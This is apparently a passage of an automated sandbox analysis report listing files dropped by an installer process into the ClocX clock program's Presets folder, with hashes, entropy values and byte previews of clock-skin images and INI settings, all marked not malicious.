File Type:	PNG image data, 150 x 145, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	8101
Entropy (8bit):	7.944900564128968
Encrypted:	false
SSDEEP:	192:E6s2mM8JBwjL+2Cze54iq+LMpWZizMVHGzRmz8Lu7vDpri15n:ZSMswf+te3q+o8szRmz8gvE3
MD5:	747303365A184814658774165BD7C883
SHA1:	93BB4D77704884F2DA950F68ACA59F1E60AE9D98
SHA-256:	9876CBE95D2BCA6E45F20BE2C75B4425DC434FF5E56DF4F7DB1985F679BF4056
SHA-512:	2612754DA59CFA739BAF3E1AD61DBD052D00E16F4DA7FDD94679585BC82CEDFF64A6C5B77C28E0D0414093FA0F09D30D0B40185D8AC191262673AD93929527D5
Malicious:	false
Preview:	.PNG........IHDR...............h....tIME.....$:O.K.....pHYs.........B.4.....PLTE.............. .#( .. .!!".#"$&$('(&#)-($&(&*(('+)--,1/0.-160.300.21454978559;86;886::=)/@-3D15B06I59B5:J:5A<7H=<B<<I3>Q<@==AG<CR@??A>EEE=BAEEDJGHDFHLHELIIEKJMLKROPNMPURLLQMWVQMQQTTSZWXVVY\XT][YSZZ\AOdMUcTNaURaWThU\eQ\mZUc\Ui][b]Zi^[q_`]]afXduiYNa\Wb\ie^qcc\teXbbeecjgieejkhgghelklbjimkgtmpilprphhrk{qrjrrtusztxtuyzxwwxt}y{rzz\|\l.mj.es.um.{u.~z.}.v}..\|...nX.~~.y..\|......\|..............................................................................................................................................................................................................................................................................................................................................................................................U....{tRNS..................................................................................................................................IDATx..

C:\Program Files (x86)\ClocX\Presets\cowboy2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	4.808211118758739
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx6TOr01Ezkp8dGIo8bCiDadKibQ0Wd9iBxLuQI:BzqFlYBSdGJQlA9QJTiBxLvI
MD5:	7B78A925BCBF93FF614A1C4FE7E84673
SHA1:	6DBD5F227E72363B4301DE8C7923442466714CD3
SHA-256:	E791213655F1CB3E5B5A08B01411E48D9EBE480166742A77F120B2964BE2D7AD
SHA-512:	7B051908EE1D78229847008A5217607EB492E174A9C56CC46A5B93360AABEA43693F61F2BD9E993A39328E7D42CCA64C5B32E12F28CA7A9F9A4E61823A56470D
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....HourColor=000 ;color of hour hand..HourLength=40 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=6 ;width of hour hand....MinuteColor=000 ;color of minute hand..MinuteLength=62 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=20 ;overlap of second hand..SecondWidth=2 ;width of second hand....CenterX=100 ;center point's X (default image_width / 2)..CenterY=100

C:\Program Files (x86)\ClocX\Presets\cowboy2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 201, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	44974
Entropy (8bit):	7.993740849593251
Encrypted:	true
SSDEEP:	768:/tfJ+gfGQkB4WLWrl6K/OYI4U0SyJIWu2erDzyHJaYJFJICsYjqAwInHEVnVw:egf/04QWAK9IN0Lq2eqaYJFOCOAwIHgq
MD5:	C41A10919D89B2E79D9602B5644BADB3
SHA1:	F83673308724DB3238FF799D30F8478C86CDD577
SHA-256:	45C550427466A8588B8B9C7EDA3AA685C38CAD1E6DCB6DE43860B214B3C3FC76
SHA-512:	AC2150D30FD8FB3FD87F338896715F02E1B4D0D1DCBEAD3C4B4F22B8BEE438C1D271CDBF01374F7721D8EE675B8839A150FDD3DD4F777393A7E9D854FDF799EF
Malicious:	false
Preview:	.PNG........IHDR.............f.};...,tEXtCreation Time.Sat 22 Sep 2007 01:46:32 -08001..~....tIME.....5%\..L....pHYs...........~.....gAMA......a.....IDATx..\{.]E..u..}....B"..%Dp....$$!...A.Ek%.[......B....Z.....,..@,....PR.A.. "D.7.H..BB...=.t..u.>...L.C2..7u.G.>}.._..>..:BGhT....:.;m.....y...v.z._.P.d..})......[..._..%.../.q..z....~..2.....2\......(U..w..SJ..!...B.%.(5....+..OBh/.?.l.j..st.9..=.Z......x..\|.....p.#.y...t.._X.XJ.....B\...=1.....6.p{:;.u]...6:1@.w..-I.myp..;'...':.....,..9{.....K...%...}.....o....W.5...$..s..6....otF....[..w...ly..&..'3..H.ZS..Dx...j....;/..;:.C........H....L...^.......-.$...._.~.^h........~.\|...f........Y...F.....F...M....@..s..;...8EM......N...MC.vM.`L"z_.d%...T>&.X+.w&I.Y..V-.M3.e().a1E..(y..\..\..@..=.6.S.....e....A.....e.v.!....8uX..J.m...wS.<L.w..q..o^58.c5Q.>..z.../..k....aN`.)/.....=+..k....fRH0.z.~Iv...Y<..N.A.../...[..%........b..bL....=q..."X4A.~.=.I..i`&.i.."Uv.T..;..?.lPx.... .:.[..o.i.,~s..^6.{....!..fB[V..[cP3

C:\Program Files (x86)\ClocX\Presets\default.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 121 x 121 x 24, resolution 2795 x 2795 px/m, cbSize 44100, bits offset 54
Category:	dropped
Size (bytes):	44100
Entropy (8bit):	3.83871121046637
Encrypted:	false
SSDEEP:	384:bTjuQGkjL9f2ulV12XTVv2ENp8JAoa1137h7ANbUx2:njXqukjk/Jc376NX
MD5:	15EAA774AC3848A3B4DDA0E66F5E9287
SHA1:	A3DF74FD4EBE8A46D301E27E295082CC4EBA3C39
SHA-256:	C9243878C5B9B666681D16DF368EB1532A5605701A25AA6121F3D5CFC7189C8E
SHA-512:	B78CB65E51590388EBC748EB260E3836DF30377A1F7A8207C0DB05FD0A3E2B8F4B4FEBD25C5640B803497079E07E11F5E1A2C74B1771ADCBCEA9ED2A188E84B2
Malicious:	false
Preview:	BMD.......6...(...y...y................................l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l...l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..iD.cA.\;{S4pL.fF(`C$]B#[@!Z@![A![B#\C#[A"Z@!\@"`C$fF(oL.zS3.Y9.dB.iD.l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l...l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..l..fC.X1.M$kA.^8.t...;..E".M*.T(.^2.\(.Y%.k0.d).v1.p+.u..p).k#.g..d .^..S..L.y7.y7.t:

C:\Program Files (x86)\ClocX\Presets\default.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.911895982050817
Encrypted:	false
SSDEEP:	24:BEZrGXE5lr9BxjTJaKhVY/qTORXFB01rfwkpWdGm8bCi51PgibQ0Wd9iBxLuQI:BkqyllTJfgLFK3MdGmQ71PXQJTiBxLvI
MD5:	D90F48DF60ACDE7569BEDC4C4B5C7AC3
SHA1:	75229A0AD9D810D292B746D9B2FA04514C509D72
SHA-256:	E444253E619E3599AB17BD1927911B8F0362254EF469886EDB53A6FAE9C580CE
SHA-512:	644CA33C38A1D7F26276FF029423BC2BB68B8E21F06AF877562DED4BBCBD3A59E368CFB5BDC10E2ACAAC0C5B7E427DA306FD4B0A44C7E03ADFD276342E7AEFD0
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\domeclock\domehour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 40 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2290
Entropy (8bit):	7.700327487136672
Encrypted:	false
SSDEEP:	48:LLDh2CM+hIEWlV2mEGE9cx7g+SNpWmefyAZZJDrS:LB2oe5lVEYx7hSNCf7Zfe
MD5:	2B3AB55EE12A47F5A20F8CFA2D46724B
SHA1:	1FB28F49EC9D8F2B7E90EEF82CFA48C5B7BD8687
SHA-256:	40A519F829558E1BD12C88F891125420079D40FF3C10B5940724F8D27D69D4B3
SHA-512:	777B53C0912C99A4EFE0B7D91BBB8D24CE4D74BAEC12DB92905976E4635BF23FC69126309D2BDA7579328170B963B0B8A6D66AE5F84C68BB8823F4AC9D79C878
Malicious:	false
Preview:	.PNG........IHDR...(..........n.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......}IDATx.b8t......>........s.+...b.....0a..{...imm9..... ..:...........^!Q...[.1....I...u.....ny9I....4......7.........9;../.?........_.s..SSQ...3...)............``^.........vvu......................7.......?g...?.%e...f...'..HHJ3........g......Vx........Sg/2.y.~.}..\!@..ps.2X...).)....t........../?.Y....U.VVV\|.. .I9i.K7o0dee3...2...........hlh..../.._.1...0l.2<z..!........._...=e8{....L...e...N.\.bm.K}.'Oc........ ..W.....Q.......P...POK....,KNV.&&#...........,++,....!....232H...........f...t..!.............a...99.L...lll...+....L..6........N..1.1......h....=...[VVV.w.>\|.......Q............................................pqo]........................??A.................^..=w........edaae...?.##.....D223_..G\|...8v..=......@L..<K.=w..{..........iww.{..>.z...?//.W.t!*%).63;.....?w...j@K1....Q...................r...rNLH....{................\|}~........(...........i...

C:\Program Files (x86)\ClocX\Presets\domeclock\domemin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 60 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	7.655538415930818
Encrypted:	false
SSDEEP:	48:3Od6w3EFNTi5xexqAPIzGS/S1eRl65PlgmpXnoBjuuSTq:3OdrUr+DqcieqempXnOvSTq
MD5:	71E6CF4FCE7A3C0088267F1A71ED8630
SHA1:	94B3755BF1077F8C52FFA7450DF6094F1C72E939
SHA-256:	EB308EFA319EA51E367092AAE0BD118081C0340B6ACAD03C1D55E431E33469D9
SHA-512:	C0D7A288D8425B3D4B22E9F48FD47F22095A631C41F6F67E0F364FDD41AC3029325B9133987C8CFD59B7816FAE02D4ADD0A6E16E923B422BAF175A062D025912
Malicious:	false
Preview:	.PNG........IHDR...<..........L......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.s..#.3....3.z..AT\.AOO.!00....3....!............,-+.........1/.................?@E...............qqq.......YQQ.....BA!...B..V.6..b.........=....+.6}....@DM....:....48<.....BDK.....>?D.KLQ.STY.:;=.vwy......1/......eii.....""........e...y.......:.9.......FFF....c..Tg...=....;>F.hfb{....11/.........kmm....%".c....+.....11............=...._^b}........jjk....j....................888...................y...........................-...............................W\|~}....b`^.........???'zzz.....1221...N........}}}.,,,...........y....................... ...............{...'................tsy.EEC..&.......=....................HHD................................?}.d..z....?\|`.6}._[;'....0...MIYAm..7......)].n..Z.:..oa`bffPVRbpttfpssc......W..+V2<z.....[ggg.WWW.........@...ED...V.........sf.v.\|..:......o...YUFZ..............=y....{.....7.0..8.\.pA.......9.Y..&.w...........

C:\Program Files (x86)\ClocX\Presets\dragon.bk

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1477
Entropy (8bit):	4.874701427171613
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4XTORXFB01rfLkpWdGm8di9MiXGibQ0Wd9iBxLuQI:BzqFluf18FKeMdGmfMiXpQJTiBxLvI
MD5:	187F4E9C78AC647EF5C632C9910211F3
SHA1:	C0BC244E495B267B294237EBB158689CFE7787A8
SHA-256:	C4E752988EA9D30089DB49CDA515FE5B4F460DB402879CBA941D27F271FDE0CB
SHA-512:	01E221AEBAD7AEA7067B4D2BFBB06D829FEB158DE0DCE336BA641DB578F8248A8FDDE2C49FB75D3E79440643091FD39A7185E1F041136BC203ACDBE3E06BCE1C
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x666666 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x444444 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=50 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=.4 ;width of second hand....

C:\Program Files (x86)\ClocX\Presets\dsaqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 129 x 129 x 16, resolution 2834 x 2834 px/m, cbSize 33596, bits offset 54
Category:	dropped
Size (bytes):	33596
Entropy (8bit):	5.943688620603497
Encrypted:	false
SSDEEP:	384:WF3WK3fGUUUUUUUUUUUUUUUUDUUUUU63EZJTL/o70pn0cCzW7dmb90:k3WK30UZpL/o70UzWkK
MD5:	4D99C681A6F8DF6BD48A49B3162B0DBB
SHA1:	123E39E10426BFEC2A050B963ECEC4FC379EAD97
SHA-256:	48DB744D53E5D7EB33715CF57215B6D556BFF12A0A21158B37215EF67CE96787
SHA-512:	FD5A0F937401FBC850FD67AAEC9274244A796AC81FD1E25A7BE753F7382FFA32D1E7B72A7EBF6EBC87C75BECBA1001195BE93C6361CFE58D35910D9393154AE8
Malicious:	false
Preview:	BM<.......6...(........................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.......................................................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...................%k-.91F.R.Z.gZkZkZk9g.^.VRJ.=.1)%...................\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|...\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|.\|..............J).9.RZk.s.w.{.{.......................{.{.{.s{o.Z.Bk-. ........

C:\Program Files (x86)\ClocX\Presets\earth.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.79578084741415
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUBRSTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:BzqFlQGiEdGmxtPBQJTiBxLvI
MD5:	D4C8BC1C07C0077783E15664BADF33E3
SHA1:	EF27B3AE33D84581098C96384784282E090AFAC1
SHA-256:	051468A847913306CF9FB5DCBF17BDDAB5AC36689DCBA6DA0374DBBB5383B6C0
SHA-512:	5F7C44CE2FBB1E4FA332436CAFDE4085A91CC55DFDC404143A586B3777AA168783F6D82396C57C443102CE9606E044845E5680209FF8234D78CCEC9E5FF4632A
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xfffFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\earth.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 186 x 186, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	57316
Entropy (8bit):	7.983908983566808
Encrypted:	false
SSDEEP:	1536:iJ+ytG7+qh+bLgR52aFR/mizDX/xwE4pr9:C+ytG7J2LY52C7X5wn9
MD5:	4AAFF353A088E9B576D7439092B1DCF5
SHA1:	CA044A1E5967D3CD2F9BB9F836B9866CD4CEC0EF
SHA-256:	08ECBB835A9061D88A2B4E8955194F7A924A951D68C9C94F587A3E2AD6E6D707
SHA-512:	5397BF8F38B2A6C3990B8545E49B37B6EB29B14115E51CBAB9C6221E0BB5E55FBA41A031D19A214165201908C6B0683CB4308B73C60BD3D3832A33B2AD8B4D2E
Malicious:	false
Preview:	.PNG........IHDR...............W.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...ZIDATx...w...U....z..r...'g%..B.$@.L...0.........\l.56...BY(....c..9...U{...Mk..].%.:.l...xG...U.U{.....g>K.cxs..../.....f....\o......f....\o......f....\o......f....\..e.#.....?.. .R.lb.qQF`..a<tl..C.Q.K..@$=....0h..AH....R`....#%.4..G..KJ.0h...8...c..,..(..U.Zb...1....B..XBb....Z. ,[.].P~&.A.H...@$..)@#d..hm4..Z..1..E...v...X..t.qh!.Z.D.H+.P.".A........h)1.XZ 0..J(.4.c....1Fb4Ha.....)1.....B..1.-......%... .Dh.f.u........R#......}s....e.h0d.aT.....).l..s@.gT....e'.L"a.I.v..8BJiY...........c.tL.E..wT..Sa...[)d..BB.W..W......`\|...zs.....q.1....wG...G<..o...O......b..atd.B6.P.......E....$.I<...T-#....ILd0Zc..r.$......J.R..eeu..j.J.........^5:x.c.b.e.....f..%..A.1..}....-.......a.}.........LM..L%.l..c359.....N.'.....s....c.....0.##$].N.K.Q..L.E...hVW.I$..H$QH...z.Wn,e....K...^...:.FZ..D..,.d..4......[.\o....6.1z....0v.g;....#{wn.}.9...[.

C:\Program Files (x86)\ClocX\Presets\earth2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1471
Entropy (8bit):	4.872104151320744
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4dTOK01rfhkpGdGm8bCi1833NPeibQ0Wd9iBxLuQI:BzqFluf1EY4dGmQD8tPBQJTiBxLvI
MD5:	F38314A74205C38938A37A67492D55F9
SHA1:	A66F27AF7D0C055BA04F2D8DE77FAA9C798D5E52
SHA-256:	EF1AFF8D42C199FAD7E1569DC34ED48F9A68B6CB15675040B6154C69164E7EAA
SHA-512:	ACADACF57D9597EEB8A83A349C6E565D1A1881EF7EBD5F0822495367A92F87AE62CC1FA07364DD756D2ECE2328DA3C3E0FE254C1B402FE3C6E83AB02DEEFF0CC
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x33CCCC ;color of hour hand..HourLength=27 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x33CCCC ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;Cente

C:\Program Files (x86)\ClocX\Presets\greenmarble\marblehour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 114 x 19, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3839
Entropy (8bit):	7.883046313078185
Encrypted:	false
SSDEEP:	96:WBxILSDd4G24IscGnu+Pk3Tt6Z3Xw0A9dqXWO:WzkSDd6GnuHTEZ3g0soD
MD5:	BD2ECAFE288B72EE504AC1A40130F02A
SHA1:	58586107F3A6CD4885C0A7801921122370E60372
SHA-256:	08F9B95562E2D5179E821797CB9158234436ECED344C6257EA60FA1DDDFA4654
SHA-512:	28A2FE295E11C03D891C94768308A2122396B587CE847D2180C07CE8729304AB0EBF257FEED7078402B1F93FF06C55DC5D2FE665046B03278E62EF2657529CAB
Malicious:	false
Preview:	.PNG........IHDR...r.........;ri.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?.)XY]..D...3...=....%1$.5?A.........A&.............................l.............l... .....@..E.o.1..~...Z.....c....9.................9..y.x.\|y.F.."p..T.......S..t.t.U....[...'N\..'-.-._?~pprs.]>y..!o......>'.?._.Y~.\<q.'HP.B.....NQA.Q...a...^6.&;.}.h........?......O........:...k....I...>.......=u.+.n.F.. .(.Qr.@.......T..e...t..p.3.6f...7....WN^.M.B..b.../,&..............}..Y....M..a.s&.Wo.....c.........y...p.s1.............\|c`dfa.be........]xy..M. .. ....+.\|x....._@.z&.....1...\|\|.&.....o.......?L.N\>`lk....g....IJ...xr......WO.:....pC3.V .....DRY..k.+ad.l. ..J4.......o.<..s.f..:.=u._...XY.....I.....Q.\...+?5...o...6................G....0....ELH.@OC~?+?.'..7...../.\|.............6....%.........'O;o_...$.i.W...........</.A...........3R..J.........w.^.\|..Y.7o..\|.......7..&.....f.QP..$.t.I...Q/...D.......I...qU.%F....7z...}....!).~.....s.6.`....

C:\Program Files (x86)\ClocX\Presets\greenmarble\marblemin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 117 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	4804
Entropy (8bit):	7.872761167878164
Encrypted:	false
SSDEEP:	96:ytePcbs8T/pKuzqSpOOTD6IZ8mE10A1bHb3GDfxkwfK:x6TT3uAxfZ8n7bHb32U
MD5:	E4F18584A1443E393889D6B0725E69B6
SHA1:	943A2815F066D5C44777EEF80D0978FFA84A696F
SHA-256:	35C6E7D3B9BF347B696EEE60A2196F10355C07F132D4AC9BE48191BD876335EF
SHA-512:	36E26F70C4699AF2F71502FCB36B564A9A2B69021FAA5A8973AFBEFE0B3305F9A9D2574D88DDD775E336433F972CAF58536ADD934BE7395A9EA0A7C41FDF2208
Malicious:	false
Preview:	.PNG........IHDR...u.........f.c(....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......OIDATx.b...?..'.G?G......=....3>5.;FI ....Q8./>5......&').....%(.............%........."...d... ..=....Tl^.....S&............./!.$.................>FA............F..y....08/M.....#"........\K<............4...........`........................................!%#..$$............a...............ec=u.F~..g._...GR...?.....u............_.n....]. ...^Bf,I.M...u....>K@j...N.......4#("";..........\.............)&........t...................................M +2............N.........u..... ...... ...................%$............"...........7.....&!&.....................................&"7........DMA......./.?&.F.....^54.wS0..........h.....H../;..../.......;K.A..gg...c....v..DD%....B.....!6.-..+......W..<.u.T.8....a...F\.....T....$6N....b.<]...,.&f-.M......].+...@8.1O...Y.E..2Iyp.'d....z. .I0....l..nV..2..9{........x4..ia>..K..r.@:.W.gGU.......yO....W.....Mw0..tw{......}.'..e.S1...q

C:\Program Files (x86)\ClocX\Presets\hallow.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	925
Entropy (8bit):	4.541321371524183
Encrypted:	false
SSDEEP:	24:BEurZuC/Tzbr1nPkLKhaLgGLXoIZKgVi0uzUrn:B9pqnkGUnNU7
MD5:	91E71226494DF487E040FAD190D8D199
SHA1:	B5647C7914884589F55E759A2A140B75CB6BF53F
SHA-256:	4664041204AC6D66DF612C225C7457CCE4CC16619D38ACAA24FB770564B99D07
SHA-512:	4DB2C9ED8BFC1209ABB92B93D59E1B34309228B6DF6C8E82EBD8AEEA6B7CED16956A0DFC74F2CF1EDE48E204552703A5E888A9CBFB668086BE468CD6351143A9
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0xFFFFFF ;color of hour hand.HourLength=75 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=6 ;width of hour hand..MinuteColor=0xFFFFFF ;color of minute hand.MinuteLength=150 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=140 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=200 ;center point's X (default image_width / 2).CenterY=200 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\hallow.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 400 x 400, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	87695
Entropy (8bit):	7.995775848325961
Encrypted:	true
SSDEEP:	1536:2gdcj1dn9NCguYm6249KZqmzkHcX3qNswTBP/o3wdvdGQwPQSXpTfTWpQdZFT:jcfDyLs9Kkm3oVTBP/hVdO/ll9
MD5:	FA8384D8DA635F35BF502976A6DC7F43
SHA1:	4CAD60130366D35DC1EA05099BAFE6DEA0E566A1
SHA-256:	AF0BC4CF79640A01CF9E991D3F73993FF47D7D148F214AF36B6143C269EF1BC3
SHA-512:	65264E3881E216F3077E724C7130E8D3F5E15F1C318D8A9ADE211D480D6F485B20B5EC0D70ADBF94453498CF2BA319BC1E5CFB25E81DB3F6C78B983294E28127
Malicious:	false
